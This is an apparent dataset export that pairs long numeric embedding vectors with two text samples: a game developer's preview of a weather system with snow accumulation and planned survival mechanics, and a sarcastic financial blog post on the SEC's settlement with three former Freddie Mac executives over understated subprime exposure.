0.03823092207312584,\n 0.0033405886497348547,\n 0.013397241942584515,\n 0.049157917499542236,\n 0.06950724124908447,\n 0.039170920848846436,\n -0.014339117333292961,\n -0.02598385512828827,\n -0.09017173945903778,\n -0.009891673922538757,\n -0.036617908626794815,\n -0.034566644579172134,\n -0.009358174167573452,\n 0.06654620170593262,\n -0.06969330459833145,\n -7.13823058767062e-33,\n -0.06490936130285263,\n 0.00971525814384222,\n -0.06786796450614929,\n -0.015197476372122765,\n -0.000026750894903670996,\n -0.058068592101335526,\n -0.03969790041446686,\n -0.007863922044634819,\n 0.07031510025262833,\n -0.03042139858007431,\n -0.028055641800165176,\n -0.04714803025126457,\n -0.022860867902636528,\n 0.0650375708937645,\n 0.014156706631183624,\n -0.0567675419151783,\n -0.03176726773381233,\n 0.0408167727291584,\n -0.10595397651195526,\n 0.021890917792916298,\n 0.027510682120919228,\n -0.04532989487051964,\n 0.011088315397500992,\n 0.05831946060061455,\n 0.0521194152534008,\n 0.0578978955745697,\n 0.07143645733594894,\n -0.0021702826488763094,\n -0.03982839360833168,\n -0.017273234203457832,\n 0.02270415984094143,\n -0.0434398353099823,\n 0.0729495957493782,\n 0.023182008415460587,\n -0.05155761539936066,\n 0.043244682252407074,\n 0.10311967879533768,\n -0.0090713482350111,\n 0.0232035331428051,\n -0.01908411644399166,\n 0.05116504058241844,\n -0.011958427727222443,\n 0.0059855966828763485,\n -0.021124765276908875,\n -0.074537493288517,\n 0.011361520737409592,\n 0.024762624874711037,\n 0.03468168526887894,\n -0.07971271127462387,\n 0.008914700709283352,\n -0.07928962260484695,\n -0.0468456856906414,\n -0.12075145542621613,\n 0.08378275483846664,\n -0.05348461493849754,\n -0.052884962409734726,\n 0.05740048363804817,\n -0.06247398629784584,\n -0.014101198874413967,\n 0.006640219129621983,\n -0.01066768541932106,\n 0.051949676126241684,\n -0.10177650302648544,\n 0.06552018225193024,\n 0.03005426749587059,\n -0.05163361877202988,\n -0.032201241701841354,\n -0.1123383417725563,\n -0.04921304062008858,\n -0.04010525345802307,\n 0.009793523699045181,\n 0.00221763807348907,\n -0.053559478372335434,\n 0.027194447815418243,\n -0.10399213433265686,\n -0.039828311651945114,\n 0.016218438744544983,\n 0.033400408923625946,\n -0.0613148994743824,\n 0.08545996993780136,\n 0.023152679204940796,\n -0.11143968999385834,\n -0.0365133136510849,\n 0.06024113669991493,\n -0.02867211401462555,\n -0.01024443656206131,\n 0.08876778930425644,\n -0.010874862782657146,\n -0.027271369472146034,\n 0.07224507629871368,\n -0.05301259458065033,\n -0.040916528552770615,\n 0.005073759239166975,\n 0.015029476955533028,\n -0.10740817338228226,\n -5.447512307910074e-8,\n 0.03723035380244255,\n 0.00903273280709982,\n -0.03797195851802826,\n -0.05478207767009735,\n -0.0054087769240140915,\n -0.018310291692614555,\n -0.04379578307271004,\n 0.016719505190849304,\n 0.01235521212220192,\n -0.002447334583848715,\n 0.07508361339569092,\n 0.024264566600322723,\n -0.04561956226825714,\n -0.023885006085038185,\n -0.0764048621058464,\n -0.08249721676111221,\n -0.021363846957683563,\n -0.05250125750899315,\n -0.019821524620056152,\n -0.0036701487842947245,\n -0.03391916677355766,\n -0.017186753451824188,\n -0.028094898909330368,\n 0.04696723073720932,\n 0.10456999391317368,\n 0.02545216679573059,\n -0.0569000169634819,\n 0.05925358086824417,\n -0.04017714411020279,\n 0.074803926050663,\n -0.055839695036411285,\n 0.014149484224617481,\n -0.005997766274958849,\n -0.015198692679405212,\n 0.06734568625688553,\n -0.028217684477567673,\n 0.05248836800456047,\n -0.008465589955449104,\n 0.00018536890274845064,\n -0.05074327439069748,\n -0.08459141105413437,\n -0.042875178158283234,\n -0.0174569021910429,\n 0.01869504153728485,\n 0.02937963604927063,\n -0.047437623143196106,\n -0.015720803290605545,\n -0.046137645840644836,\n -0.010118800215423107,\n -0.005689868703484535,\n -0.04415386542677879,\n -0.08500976860523224,\n -0.003971382509917021,\n 0.0021314446348696947,\n 0.0174851231276989,\n -0.020884491503238678,\n -0.03351036086678505,\n -0.019608955830335617,\n 0.04965759441256523,\n -0.06107421964406967,\n 0.0478137768805027,\n -0.01401993166655302,\n -0.04065994918346405,\n 0.03220662847161293\n]"}}},{"rowIdx":1298,"cells":{"text":{"kind":"string","value":"Weather! Here is a very early first peek at our new weather system. Pictured here it is drizzling freezing rain after snowfall in the wasteland. Snow realistically piles on top of surfaces exposed to the weather. Things under cover or interiors do not get rain or snow in them.\n\nWe plan on adding cold and hot survival to accompany the new beautiful weather effects. We’ll have rain and snow, plus dust storms, and hopefully even lightning. What is really cool is the old trampled snow we have in the snow biome gets fresh snow on top of it and windows and nooks and crannies just get some snow in them. It accumulates over time and changes appearance it looks awesome. I’ll post a video once we get everything polished."},"embedding":{"kind":"list like","value":[-0.06180373951792717,-0.013865186832845211,0.16222549974918365,0.05541212856769562,0.09397587925195694,-0.06118108332157135,-0.0009064478799700737,-0.013398612849414349,-0.05570800602436066,0.05714249238371849,-0.07564933598041534,-0.044625766575336456,0.04242860898375511,0.03675256669521332,-0.046273499727249146,-0.010143345221877098,0.01050373911857605,-0.07564127445220947,-0.0028481397312134504,0.029970677569508553,-0.00872182659804821,0.017857292667031288,-0.05356188490986824,-0.0053300512954592705,-0.022841354832053185,0.0685383528470993,-0.05940095707774162,0.0941564291715622,-0.0541946217417717,-0.046178434044122696,-0.021933989599347115,0.06057173013687134,0.03436557948589325,-0.0251172948628664,0.009429167956113815,0.01894913613796234,0.040667422115802765,-0.06192914396524429,-0.05513039603829384,0.004606770817190409,-0.0380093976855278,-0.028818713501095772,0.01859399303793907,-0.03518243879079819,-0.0171688050031662,0.0038665446918457747,0.02332906238734722,0.02929878607392311,0.06759677082300186,-0.029614241793751717,0.0030708929989486933,-0.014804520644247532,-0.04910208657383919,0.045373715460300446,-0.06658507138490677,0.026235895231366158,-0.021182483062148094,-0.10397591441869736,-0.049797214567661285,-0.06583748757839203,0.0328214056789875,0.036689579486846924,-0.08954400569200516,0.0647902563214302,0.16113467514514923,-0.05288088321685791,-0.06890357285737991,0.05509335175156593,0.03198729455471039,-0.03793838992714882,-0.050796136260032654,0.13123025000095367,0.010191502049565315,-0.033942896872758865,-0.041699521243572235,0.017695924267172813,-0.05715309455990791,-0.06495211273431778,0.021851040422916412,-0.013938660733401775,0.096766397356987,-0.013156912289559841,0.06337550282478333,0.00072313571581617,-0.06131695955991745,0.018656814470887184,0.025716805830597878,-0.03331608697772026,0.024854928255081177,-0.06623533368110657,-0.047970641404390335,-0.008623518981039524,-0.005710730794817209,0.024733688682317734,-0.14793576300144196,0.11065288633108139,0.04210460186004639,-0.08337738364934921,-0.04508411884307861,0.05874891206622124,-0.03515317663550377,-0.06935030966997147,0.06288351863622665,-0.038080669939517975,0.061735689640045166,-0.0138687239959836,-0.04025373235344887,-0.01177755743265152,-0.050540417432785034,0.009813077747821808,-0.01254414115101099,0.02422594092786312,-0.054256755858659744,0.06610596925020218,0.03184132277965546,-0.06355395168066025,-0.03354322537779808,0.011994855478405952,-0.010400193743407726,0.005073347594588995,0.013159721158444881,0.04313574358820915,-0.029754001647233963,0.06526223570108414,0.1002672016620636,0.04420588165521622,0.035830289125442505,4.975168902575973e-33,0.07905726134777069,-0.019481081515550613,0.015092693269252777,0.08332077413797379,0.08054124563932419,-0.07563542574644089,0.0045785135589540005,-0.07231258600950241,-0.036517564207315445,0.04977011680603027,0.03474241495132446,0.037505824118852615,-0.04523974657058716,0.027048729360103607,0.02307954989373684,-0.0468519851565361,-0.07979683578014374,-0.04906149581074715,-0.02189188078045845,0.1428270787000656,-0.07796329259872437,0.03831325098872185,-0.004807662684470415,0.03002971224486828,0.03188876435160637,-0.002026154426857829,0.05329173058271408,-0.02279639057815075,-0.0050128609873354435,-0.0000795315281720832,0.04417301341891289,-0.034573107957839966,0.0032439245842397213,0.029054198414087296,-0.018076322972774506,-0.01981670781970024,-0.024705028161406517,-0.031116478145122528,0.04145238548517227,-0.013826664537191391,-0.017866311594843864,-0.056196343153715134,-0.030604269355535507,-0.03184106945991516,0.06388279050588608,-0.0059077125042676926,0.09043576568365097,0.01972377859055996,-0.06324589997529984,0.005691814702004194,0.030656874179840088,0.04192865267395973,-0.02164769172668457,-0.02566611021757126,-0.05143158137798309,0.011847365647554398,0.10307487845420837,-0.07397883385419846,0.028199495747685432,-0.000932594237383455,0.006523604039102793,0.007548050954937935,0.03627170994877815,-0.15613797307014465,-0.0038765238132327795,-0.02875790372490883,0.026130670681595802,0.10560194402933121,-0.03512768819928169,0.009653622284531593,-0.018250832334160805,-0.008090752176940441,0.03691955283284187,0.04189727082848549,0.06318835914134979,0.0230550616979599,0.01195992436259985,-0.04914941266179085,0.018502281978726387,0.021389910951256752,-0.042847901582717896,0.017730791121721268,-0.05276932194828987,-0.008330194279551506,-0.01455014105886221,0.002050062408670783,0.025566138327121735,0.0024840962141752243,-0.011040518060326576,0.05053376778960228,0.007712943945080042,-0.013165606185793877,0.0680045485496521,0.038915231823921204,0.04697958379983902,-6.426304923722579e-33,0.06914253532886505,-0.02905982732772827,-0.008740687742829323,0.02936382032930851,-0.03140642121434212,0.054406531155109406,-0.0643332302570343,0.09528554230928421,0.028574345633387566,-0.016744984313845634,-0.0296611487865448,0.07155761867761612,0.02281414531171322,-0.04745495319366455,-0.005173305049538612,0.04261057451367378,0.019011128693819046,-0.023299288004636765,-0.05732361227273941,-0.03279643505811691,-0.003914607688784599,0.06526696681976318,-0.07094347476959229,-0.0022042638156563044,-0.06369215250015259,0.014603907242417336,0.029635289683938026,0.055257927626371384,0.0025374870747327805,-0.019418787211179733,-0.06973238289356232,-0.051347967237234116,0.037407051771879196,-0.04324657469987869,-0.030650081112980843,0.07441772520542145,0.05708128958940506,-0.16292163729667664,-0.09547373652458191,-0.07514209300279617,0.05478140711784363,-0.08131550252437592,0.09821770340204239,0.024105852469801903,0.08305182307958603,-0.06758617609739304,-0.11021295934915543,0.02486954815685749,0.028511786833405495,-0.020212145522236824,0.07175571471452713,-0.02433111146092415,-0.0520293265581131,-0.02594025805592537,0.021681152284145355,-0.01373457070440054,-0.002031216397881508,-0.031854499131441116,-0.039331212639808655,0.03680591657757759,-0.06147894263267517,-0.021952776238322258,-0.054144080728292465,-0.0072793737053871155,-0.021893713623285294,-0.05839817598462105,-0.0290810689330101,-0.05228748917579651,-0.06835346668958664,0.06747778505086899,0.06040516123175621,-0.008437898941338062,-0.0841539278626442,-0.08861447125673294,0.09915753453969955,0.009592714719474316,0.09321195632219315,0.013337062671780586,-0.011625089682638645,0.019135288894176483,-0.07714244723320007,0.01806650124490261,-0.042489856481552124,0.06995947659015656,0.07003007084131241,0.023984422907233238,-0.012595228850841522,-0.06736042350530624,0.004479026887565851,0.06165468320250511,0.03043222613632679,0.04659826681017876,-0.03619987145066261,0.046812642365694046,0.02306954562664032,-5.193170693473803e-8,0.04485585540533066,0.048135921359062195,-0.044304411858320236,0.003778839949518442,-0.012817326001822948,-0.045725490897893906,0.05559598654508591,-0.0680384561419487,0.042480211704969406,-0.04886723309755325,0.0012894534738734365,0.03995468467473984,0.009732086211442947,0.1152195855975151,0.011316939257085323,0.026813814416527748,-0.03525213897228241,0.008412862196564674,-0.08567409962415695,-0.06204007938504219,-0.010711929760873318,-0.011267313733696938,0.012610863894224167,0.026409868150949478,0.022206954658031464,0.01700761169195175,0.02316943183541298,-0.03108716942369938,0.06837163120508194,0.06336145848035812,-0.10428693145513535,-0.018078818917274475,-0.02796896919608116,0.012844354845583439,0.016497701406478882,-0.04053385183215141,-0.0032991727348417044,0.025917265564203262,-0.013067268766462803,-0.02290700189769268,0.030969679355621338,-0.023690667003393173,-0.015677357092499733,0.0013481936184689403,-0.03780702129006386,0.018669912591576576,-0.05236396938562393,-0.010315826162695885,0.031929899007081985,0.0417599193751812,-0.03445104509592056,-0.031621433794498444,0.009600057266652584,0.1063169613480568,0.05432294309139252,0.07274330407381058,-0.03825125843286514,-0.03021460585296154,0.037483252584934235,0.0680554136633873,0.0012647854164242744,-0.06840036809444427,-0.15073099732398987,0.07627608627080917],"string":"[\n -0.06180373951792717,\n -0.013865186832845211,\n 0.16222549974918365,\n 0.05541212856769562,\n 0.09397587925195694,\n -0.06118108332157135,\n -0.0009064478799700737,\n -0.013398612849414349,\n -0.05570800602436066,\n 0.05714249238371849,\n -0.07564933598041534,\n -0.044625766575336456,\n 0.04242860898375511,\n 0.03675256669521332,\n -0.046273499727249146,\n -0.010143345221877098,\n 0.01050373911857605,\n -0.07564127445220947,\n -0.0028481397312134504,\n 0.029970677569508553,\n -0.00872182659804821,\n 0.017857292667031288,\n -0.05356188490986824,\n -0.0053300512954592705,\n -0.022841354832053185,\n 0.0685383528470993,\n -0.05940095707774162,\n 0.0941564291715622,\n -0.0541946217417717,\n -0.046178434044122696,\n -0.021933989599347115,\n 0.06057173013687134,\n 0.03436557948589325,\n -0.0251172948628664,\n 0.009429167956113815,\n 0.01894913613796234,\n 0.040667422115802765,\n -0.06192914396524429,\n -0.05513039603829384,\n 0.004606770817190409,\n -0.0380093976855278,\n -0.028818713501095772,\n 0.01859399303793907,\n -0.03518243879079819,\n -0.0171688050031662,\n 0.0038665446918457747,\n 0.02332906238734722,\n 0.02929878607392311,\n 0.06759677082300186,\n -0.029614241793751717,\n 0.0030708929989486933,\n -0.014804520644247532,\n -0.04910208657383919,\n 0.045373715460300446,\n -0.06658507138490677,\n 0.026235895231366158,\n -0.021182483062148094,\n -0.10397591441869736,\n -0.049797214567661285,\n -0.06583748757839203,\n 0.0328214056789875,\n 0.036689579486846924,\n -0.08954400569200516,\n 0.0647902563214302,\n 0.16113467514514923,\n -0.05288088321685791,\n -0.06890357285737991,\n 0.05509335175156593,\n 0.03198729455471039,\n -0.03793838992714882,\n -0.050796136260032654,\n 0.13123025000095367,\n 0.010191502049565315,\n -0.033942896872758865,\n -0.041699521243572235,\n 0.017695924267172813,\n -0.05715309455990791,\n -0.06495211273431778,\n 0.021851040422916412,\n -0.013938660733401775,\n 0.096766397356987,\n -0.013156912289559841,\n 0.06337550282478333,\n 0.00072313571581617,\n -0.06131695955991745,\n 0.018656814470887184,\n 0.025716805830597878,\n -0.03331608697772026,\n 0.024854928255081177,\n -0.06623533368110657,\n -0.047970641404390335,\n -0.008623518981039524,\n -0.005710730794817209,\n 0.024733688682317734,\n -0.14793576300144196,\n 0.11065288633108139,\n 0.04210460186004639,\n -0.08337738364934921,\n -0.04508411884307861,\n 0.05874891206622124,\n -0.03515317663550377,\n -0.06935030966997147,\n 0.06288351863622665,\n -0.038080669939517975,\n 0.061735689640045166,\n -0.0138687239959836,\n -0.04025373235344887,\n -0.01177755743265152,\n -0.050540417432785034,\n 0.009813077747821808,\n -0.01254414115101099,\n 0.02422594092786312,\n -0.054256755858659744,\n 0.06610596925020218,\n 0.03184132277965546,\n -0.06355395168066025,\n -0.03354322537779808,\n 0.011994855478405952,\n -0.010400193743407726,\n 0.005073347594588995,\n 0.013159721158444881,\n 0.04313574358820915,\n -0.029754001647233963,\n 0.06526223570108414,\n 0.1002672016620636,\n 0.04420588165521622,\n 0.035830289125442505,\n 4.975168902575973e-33,\n 0.07905726134777069,\n -0.019481081515550613,\n 0.015092693269252777,\n 0.08332077413797379,\n 0.08054124563932419,\n -0.07563542574644089,\n 0.0045785135589540005,\n -0.07231258600950241,\n -0.036517564207315445,\n 0.04977011680603027,\n 0.03474241495132446,\n 0.037505824118852615,\n -0.04523974657058716,\n 0.027048729360103607,\n 0.02307954989373684,\n -0.0468519851565361,\n -0.07979683578014374,\n -0.04906149581074715,\n -0.02189188078045845,\n 0.1428270787000656,\n -0.07796329259872437,\n 0.03831325098872185,\n -0.004807662684470415,\n 0.03002971224486828,\n 0.03188876435160637,\n -0.002026154426857829,\n 0.05329173058271408,\n -0.02279639057815075,\n -0.0050128609873354435,\n -0.0000795315281720832,\n 0.04417301341891289,\n -0.034573107957839966,\n 0.0032439245842397213,\n 0.029054198414087296,\n -0.018076322972774506,\n -0.01981670781970024,\n -0.024705028161406517,\n -0.031116478145122528,\n 0.04145238548517227,\n -0.013826664537191391,\n -0.017866311594843864,\n -0.056196343153715134,\n -0.030604269355535507,\n -0.03184106945991516,\n 0.06388279050588608,\n -0.0059077125042676926,\n 0.09043576568365097,\n 0.01972377859055996,\n -0.06324589997529984,\n 0.005691814702004194,\n 0.030656874179840088,\n 0.04192865267395973,\n -0.02164769172668457,\n -0.02566611021757126,\n -0.05143158137798309,\n 0.011847365647554398,\n 0.10307487845420837,\n -0.07397883385419846,\n 0.028199495747685432,\n -0.000932594237383455,\n 0.006523604039102793,\n 0.007548050954937935,\n 0.03627170994877815,\n -0.15613797307014465,\n -0.0038765238132327795,\n -0.02875790372490883,\n 0.026130670681595802,\n 0.10560194402933121,\n -0.03512768819928169,\n 0.009653622284531593,\n -0.018250832334160805,\n -0.008090752176940441,\n 0.03691955283284187,\n 0.04189727082848549,\n 0.06318835914134979,\n 0.0230550616979599,\n 0.01195992436259985,\n -0.04914941266179085,\n 0.018502281978726387,\n 0.021389910951256752,\n -0.042847901582717896,\n 0.017730791121721268,\n -0.05276932194828987,\n -0.008330194279551506,\n -0.01455014105886221,\n 0.002050062408670783,\n 0.025566138327121735,\n 0.0024840962141752243,\n -0.011040518060326576,\n 0.05053376778960228,\n 0.007712943945080042,\n -0.013165606185793877,\n 0.0680045485496521,\n 0.038915231823921204,\n 0.04697958379983902,\n -6.426304923722579e-33,\n 0.06914253532886505,\n -0.02905982732772827,\n -0.008740687742829323,\n 0.02936382032930851,\n -0.03140642121434212,\n 0.054406531155109406,\n -0.0643332302570343,\n 0.09528554230928421,\n 0.028574345633387566,\n -0.016744984313845634,\n -0.0296611487865448,\n 0.07155761867761612,\n 0.02281414531171322,\n -0.04745495319366455,\n -0.005173305049538612,\n 0.04261057451367378,\n 0.019011128693819046,\n -0.023299288004636765,\n -0.05732361227273941,\n -0.03279643505811691,\n -0.003914607688784599,\n 0.06526696681976318,\n -0.07094347476959229,\n -0.0022042638156563044,\n -0.06369215250015259,\n 0.014603907242417336,\n 0.029635289683938026,\n 0.055257927626371384,\n 0.0025374870747327805,\n -0.019418787211179733,\n -0.06973238289356232,\n -0.051347967237234116,\n 0.037407051771879196,\n -0.04324657469987869,\n -0.030650081112980843,\n 0.07441772520542145,\n 0.05708128958940506,\n -0.16292163729667664,\n -0.09547373652458191,\n -0.07514209300279617,\n 0.05478140711784363,\n -0.08131550252437592,\n 0.09821770340204239,\n 0.024105852469801903,\n 0.08305182307958603,\n -0.06758617609739304,\n -0.11021295934915543,\n 0.02486954815685749,\n 0.028511786833405495,\n -0.020212145522236824,\n 0.07175571471452713,\n -0.02433111146092415,\n -0.0520293265581131,\n -0.02594025805592537,\n 0.021681152284145355,\n -0.01373457070440054,\n -0.002031216397881508,\n -0.031854499131441116,\n -0.039331212639808655,\n 0.03680591657757759,\n -0.06147894263267517,\n -0.021952776238322258,\n -0.054144080728292465,\n -0.0072793737053871155,\n -0.021893713623285294,\n -0.05839817598462105,\n -0.0290810689330101,\n -0.05228748917579651,\n -0.06835346668958664,\n 0.06747778505086899,\n 0.06040516123175621,\n -0.008437898941338062,\n -0.0841539278626442,\n -0.08861447125673294,\n 0.09915753453969955,\n 0.009592714719474316,\n 0.09321195632219315,\n 0.013337062671780586,\n -0.011625089682638645,\n 0.019135288894176483,\n -0.07714244723320007,\n 0.01806650124490261,\n -0.042489856481552124,\n 0.06995947659015656,\n 0.07003007084131241,\n 0.023984422907233238,\n -0.012595228850841522,\n -0.06736042350530624,\n 0.004479026887565851,\n 0.06165468320250511,\n 0.03043222613632679,\n 0.04659826681017876,\n -0.03619987145066261,\n 0.046812642365694046,\n 0.02306954562664032,\n -5.193170693473803e-8,\n 0.04485585540533066,\n 0.048135921359062195,\n -0.044304411858320236,\n 0.003778839949518442,\n -0.012817326001822948,\n -0.045725490897893906,\n 0.05559598654508591,\n -0.0680384561419487,\n 0.042480211704969406,\n -0.04886723309755325,\n 0.0012894534738734365,\n 0.03995468467473984,\n 0.009732086211442947,\n 0.1152195855975151,\n 0.011316939257085323,\n 0.026813814416527748,\n -0.03525213897228241,\n 0.008412862196564674,\n -0.08567409962415695,\n -0.06204007938504219,\n -0.010711929760873318,\n -0.011267313733696938,\n 0.012610863894224167,\n 0.026409868150949478,\n 0.022206954658031464,\n 0.01700761169195175,\n 0.02316943183541298,\n -0.03108716942369938,\n 0.06837163120508194,\n 0.06336145848035812,\n -0.10428693145513535,\n -0.018078818917274475,\n -0.02796896919608116,\n 0.012844354845583439,\n 0.016497701406478882,\n -0.04053385183215141,\n -0.0032991727348417044,\n 0.025917265564203262,\n -0.013067268766462803,\n -0.02290700189769268,\n 0.030969679355621338,\n -0.023690667003393173,\n -0.015677357092499733,\n 0.0013481936184689403,\n -0.03780702129006386,\n 0.018669912591576576,\n -0.05236396938562393,\n -0.010315826162695885,\n 0.031929899007081985,\n 0.0417599193751812,\n -0.03445104509592056,\n -0.031621433794498444,\n 0.009600057266652584,\n 0.1063169613480568,\n 0.05432294309139252,\n 0.07274330407381058,\n -0.03825125843286514,\n -0.03021460585296154,\n 0.037483252584934235,\n 0.0680554136633873,\n 0.0012647854164242744,\n -0.06840036809444427,\n -0.15073099732398987,\n 0.07627608627080917\n]"}}},{"rowIdx":1299,"cells":{"text":{"kind":"string","value":"Last month, we discussed a government report which showed that, much to the chagrin of a few billionaires and a long line of retail investors who bought the proverbial dip, Fannie Mae and Freddie Mac may be destined, by design, by decades of reckless behavior, and by Treasury decree, to be insolvent most of the time. Today, we learned that when it comes to accountability for the executives who helped put the companies in a position whereby receivership became necessary in mid-2008, we can forget about it.\n\nIn what was billed as a “high profile” case, the SEC had sought financial and other penalties against three former Freddie Mac executives who allegedly “misled” investors in 2006 by understating the amount of subprime exposure the GSE had on its books while it was simultaneously still sucking up and packaging bad loans. If the SEC allegations are indeed accurate, it’s probably safe to say that using the term “understated” to describe the executives’ misrepresentations is, well, an understatement, because it appears they may have lowballed the figure by a factor of 28. Here’s AP:\n\nAccording to the SEC, Fannie and Freddie misrepresented their exposure to mortgages for borrowers with weak credit in reports, speeches and congressional testimony. The SEC said Freddie told investors in late 2006 that it held between $2 billion and $6 billion of subprime mortgages on its books — but its actual subprime holdings were actually closer to $141 billion, or 10 percent of its portfolio in 2006, and $244 billion, or 14 percent, by 2008.\n\nBut all’s well that ends in a catastrophic housing market meltdown apparently because as WSJ notes, everyone seems to have gotten a pretty good deal considering their actions may have contributed mightily to the worst financial crisis since The Great Depression:\n\nThe civil case, filed in 2011, had alleged that three Freddie executives, including former Chief Executive Officer Richard Syron, knowingly misled investors about the volume of risky mortgages the company purchased as the housing boom came to an end. The SEC had sought financial penalties against the executives and an order barring them from serving as officers and directors at other companies. Instead, the executives agreed for a limited time not to sign certain reports required by chief executives or finance chiefs and to pay a total of $310,000 to a fund meant to compensate defrauded investors.\n\nThe breakdown of the fees is as follows: Richard Syron, $250,000; Donald Bisenius, $50,000; Patricia Cook, $10,000. As you can see, Ms. Cook got off pretty easy, but then again, they all did because they don’t actually have to pay the fines:\n\nThose amounts will be paid by insurance from Freddie Mac that covered the executives.\n\nAnd no one had to admit to anything of course:\n\nThe pact said both sides agreed to the settlement “without conceding the strengths and weaknesses of their respective claims and defenses.”\n\nWhich is just fine with the folks from Freddie who understandably believe it’s not in their best interest for the government to continue to investigate them for fraud and who are pleased to report that in addition to the fact that they will not have to pay anything out of pocket, they will not be limited “in any practical way” by the decision:\n\nMr. Syron said, “The agreement states that it is not in the interests of justice to continue to litigate this matter, and I wholeheartedly agree with that sentiment.” Steven Salky, who represented Ms. Cook, said, they ”are extremely pleased with this resolution.” Mr. Bisenius said, “The undertakings to which I have agreed in order to put this case behind me do not limit me in any practical way.”\n\nSo in the end, all three executives were slapped with fines which they don’t have to pay and were reprimanded in a way that doesn’t limit their future activities at all, which the SEC reckons is commensurate with their part in sinking the entire world economy:\n\n“The settlement’s limitations on future activities (ZH: these are the limitations that don’t limit any one in a practical way) and financial payments (ZH: financial payments they don’t have to pay) reflect an appropriate resolution of the matter,” said Andrew Ceresney, the SEC’s enforcement director.\n\nAnd remember, there's just one month left under Eric Holder's recent ultimatum which may or may not mean that after May...\n\n* * *\n\nMeanwhile, FHFA officials are busy making sure there’s no chance that the two entities will ever get themselves into another situation where their securitization practices are likely to encourage shoddy lending standards. Here’s WSJ from an article that was posted Wednesday afternoon:"},"embedding":{"kind":"list like","value":[-0.02640632912516594,-0.028007086366415024,0.05192742496728897,0.0664181262254715,0.01225372962653637,-0.012627065181732178,0.04986022412776947,0.08573436737060547,0.021200217306613922,0.019037043675780296,0.04738474637269974,0.055808596312999725,0.06029904633760452,-0.09543737024068832,0.008823898620903492,-0.05134577304124832,0.046536754816770554,-0.008546855300664902,-0.0853034034371376,0.0385948084294796,0.040574319660663605,-0.05213971808552742,-0.11250410974025726,0.06739891320466995,-0.006210907828062773,-0.05015285313129425,-0.032477814704179764,-0.05771646276116371,-0.08903278410434723,-0.020749595016241074,-0.026739004999399185,-0.028473002836108208,0.027803827077150345,0.07002079486846924,0.03458426520228386,0.03011566586792469,0.06370292603969574,-0.008713528513908386,-0.018429024145007133,0.018697652965784073,0.039473552256822586,-0.019730014726519585,0.0012636891333386302,-0.008013760671019554,-0.0016619644593447447,-0.04469988867640495,0.07134214043617249,-0.028469901531934738,-0.08996843546628952,-0.00811280682682991,-0.06430912017822266,-0.028583336621522903,0.08394701778888702,-0.04895087704062462,-0.04048214852809906,0.03781338408589363,-0.0037110133562237024,-0.054916396737098694,0.037028633058071136,0.01651357114315033,0.013694003224372864,-0.029159028083086014,-0.061957743018865585,-0.0321597084403038,0.053335823118686676,0.027144882827997208,0.027433741837739944,-0.03457038477063179,0.03433941304683685,0.09870639443397522,0.12938307225704193,-0.16375376284122467,-0.018574081361293793,0.020622748881578445,-0.012402530759572983,-0.02510189265012741,0.0051625617779791355,0.0860970988869667,0.08060262352228165,-0.1062512919306755,0.07758917659521103,-0.06465406715869904,-0.04098138213157654,-0.074271060526371,-0.0012597755994647741,-0.041335541754961014,-0.016874782741069794,-0.003920051269233227,0.03807878866791725,0.0021096179261803627,0.036819927394390106,-0.05430908128619194,0.08684573322534561,0.0015868261689320207,0.039804793894290924,0.009997677057981491,-0.026652159169316292,-0.0762171819806099,-0.03945402428507805,0.08723445981740952,-0.02214948832988739,0.12258397787809372,-0.08313637226819992,-0.014158410020172596,0.017200389876961708,-0.07826980948448181,0.01101559679955244,0.01836996152997017,-0.09183645248413086,0.017564503476023674,-0.008279534988105297,0.04774504527449608,-0.03095964342355728,0.024879079312086105,0.026257121935486794,0.030287565663456917,-0.007870533503592014,0.012939177453517914,-0.000764561234973371,0.004231465980410576,0.08816973119974136,0.08723684400320053,0.011531642638146877,0.0611049123108387,-0.0638100653886795,0.03163760527968407,-0.14296461641788483,1.627514356712682e-33,-0.014231652021408081,0.055240508168935776,0.02118626981973648,-0.0257884431630373,-0.024814771488308907,-0.013241329230368137,-0.034803394228219986,-0.03677869588136673,0.08752273768186569,0.09379899501800537,-0.007575126830488443,0.03499555215239525,-0.011726575903594494,-0.005476064048707485,-0.04312698543071747,0.013269607909023762,-0.06920932978391647,0.036450307816267014,0.02146071195602417,-0.009224174544215202,-0.007206066977232695,0.033938415348529816,-0.009891735389828682,-0.07671797275543213,-0.010316664353013039,-0.07212638109922409,-0.09846417605876923,0.012374000623822212,0.019291667267680168,0.02674693800508976,0.02499869093298912,-0.0278953704982996,0.08264819532632828,-0.0248448196798563,0.02591821737587452,-0.03686825558543205,-0.00782032124698162,-0.03990798071026802,-0.011659997515380383,0.052068136632442474,-0.07081781327724457,0.03834255784749985,-0.045134760439395905,-0.014567968435585499,-0.03638486936688423,0.06586035341024399,-0.017019817605614662,-0.10078645497560501,-0.0652603805065155,0.03763366863131523,0.05508372187614441,0.01757640950381756,0.04559631645679474,0.028500838205218315,-0.08246587961912155,0.013911347836256027,0.025294989347457886,-0.08666595816612244,0.048176731914281845,-0.026318619027733803,0.07139098644256592,0.00980397779494524,-0.0232730470597744,-0.044286999851465225,-0.06112176179885864,0.06268958747386932,0.05636795982718468,0.11333005130290985,-0.10516765713691711,0.04082461819052696,-0.034090396016836166,-0.052349597215652466,-0.021281005814671516,-0.00208142027258873,-0.0826525166630745,-0.04847050458192825,-0.020573850721120834,0.0693574994802475,0.034913070499897,-0.0392347127199173,0.0465833842754364,-0.060765136033296585,0.07919066399335861,0.01876811496913433,-0.027082553133368492,0.06762140244245529,0.05150572210550308,0.008251409977674484,0.011735877022147179,0.028023360297083855,-0.023875046521425247,0.005642393138259649,0.049145977944135666,0.03970032557845116,-0.06133975461125374,-3.931788729184587e-33,-0.12444168329238892,-0.052530109882354736,-0.024028973653912544,-0.019837280735373497,-0.07658461481332779,0.018649261444807053,-0.003711588215082884,-0.03938690945506096,-0.011678295210003853,-0.03445162624120712,-0.07803136110305786,0.002259747125208378,-0.026788044720888138,-0.02906748466193676,-0.06414967030286789,-0.023572422564029694,0.024142013862729073,-0.04614557698369026,0.016691623255610466,-0.04375031962990761,0.1263701617717743,-0.013303807005286217,0.005363434087485075,0.08196049183607101,-0.048135027289390564,0.023747306317090988,0.027655327692627907,-0.015244862996041775,-0.03062966838479042,-0.015211929567158222,0.02048763632774353,0.04545187950134277,0.040107544511556625,-0.007064875680953264,-0.04278544709086418,-0.029671685770154,0.009326416999101639,-0.010978156700730324,-0.04806367680430412,-0.047009117901325226,-0.03821489214897156,0.020176690071821213,-0.04172474890947342,0.013082458637654781,0.010673695243895054,0.04864172264933586,0.020580526441335678,-0.07293606549501419,0.07025666534900665,0.0189686082303524,-0.04905810207128525,-0.08965367078781128,0.0381360724568367,0.1304779350757599,-0.09198053181171417,-0.01344760